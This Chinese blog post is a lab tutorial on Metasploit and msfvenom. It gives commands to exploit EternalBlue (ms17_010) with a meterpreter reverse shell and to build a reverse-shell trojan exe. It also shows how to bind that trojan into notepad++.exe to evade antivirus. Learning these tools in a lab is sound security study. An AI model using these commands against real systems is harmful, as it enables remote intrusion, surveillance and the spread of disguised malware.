avatar

cindahy

A text-focused Halo theme

  • 首页
  • 文章分类
  • 项目
  • 关于
Home metasploit,msfvenom(生成木马后门)初步学习
文章

metasploit,msfvenom(生成木马后门)初步学习

Posted 2024-02-29 Updated 2025-08- 19
By Administrator
14~19 min read

metasploit

  • metasploit

    • 介绍

    • 使用

    • meterpreter

  • msfvenom(生成木马后门)

    • 介绍

    • 使用

    • 免杀

      • 捆绑木马

      • 加壳


攻击机为kali,IP:192.168.23.129
靶机为windows7,IP:192.168.23.132
以永恒之蓝漏洞为例

metasploit

介绍

msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。(可以让复杂的漏洞攻击流程变的非常简单)

使用

  1. 在命令行输入msfconsole。

  2. 使用模块

    • 输入search 漏洞编号如:

      以ms17_010(永恒之蓝)为例。

  3. 配置模块必选项。

    • 复制序号0对应的

    exploit/windows/smb/ms17_010_eternalblue
    
    show options  #拉出设置
    
    • (显示相关配置)required对应为yes的是必选项。

    • 逐个输入

       set RHOSTS IP靶机
       set Payload windows/x64/meterpreter/reverse_tcp
       set LHOST IP地址攻击机
      
      • RHOSTS为被攻击目标,LHOST为攻击的主机,ipconfig或者ifconfig查看IP是否正确,不对的改一下

      • Payload是攻击载荷,就是攻击完成后想干啥,这里是想获取meterpreter,payload包含在exploit里。这里payload已默认为windows/x64/meterpreter/reverse_tcp,可改可不改

      • 端口设置成没有被占用的。

      • 代码运行

  4. 运行模块

    run
    

    如图
    在run之后最后一行会出现meterpreter,表明此过程作用是获取meterpreter,如图。

meterpreter

meterpreter是metasploit框架中的一个拓展模块,是一个强大的后渗透模块,可以输入help查看帮助信息
可以远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统等等
我们可以输入help查看我们可以进行的操作。

如查看靶机的网络摄像头情况,输入webcam_list,这里可以看到没有摄像头。

msfvenom(生成木马后门)

介绍

msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。(是在shell中使用)

使用

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -o demo.exe


lhost为主机ip,lport设置为没有被占用的端口号。
代码运行

这样木马文件就生成了

  • 开启对应端口(9999)

    msfconsole
    
    use exploit/multi/handler
    
  • 进行和上文差不多的设置

    show options
    


    对应msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.129 lport=9999 -f exe -o demo.exe这一命令进行更改。

    set lhost 192.168.123.129
    set lport 9999
    set payload windows/x64/meterpreter/reverse_tcp
    
  • 最后

    run
    


这里run的成功运行需要靶机点击对应的木马文件

  • 然后输入help查看可以进行的操作如操控对方鼠标和摄像头。

免杀

捆绑木马

把木马文件与正常的文件(.exe)捆绑
如下列代码把木马文件与notepad-plus-plus.org/捆绑

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.23.129 lport=9999 -f exe -x notepad++.exe -o demo1.exe

加壳

压缩壳,加密壳

License:  CC BY 4.0
Share

Further Reading

OLDER

NEWER

《白帽子讲Web安全》学习笔记第一章

Recently Updated

  • 常见安全产品整理(防火墙,WAF,EDR)
  • ELK从入门到实践
  • bp+mumu模拟器app抓包
  • xray漏扫工具
  • Java反序列化-RMI的几种攻击方式

Trending Tags

安全运营 文件上传 php反序列化 xss csrf ssrf xxe sql php 白帽子讲web安全

Contents

©2025 cindahy. Some rights reserved.

Using the Halo theme Chirpy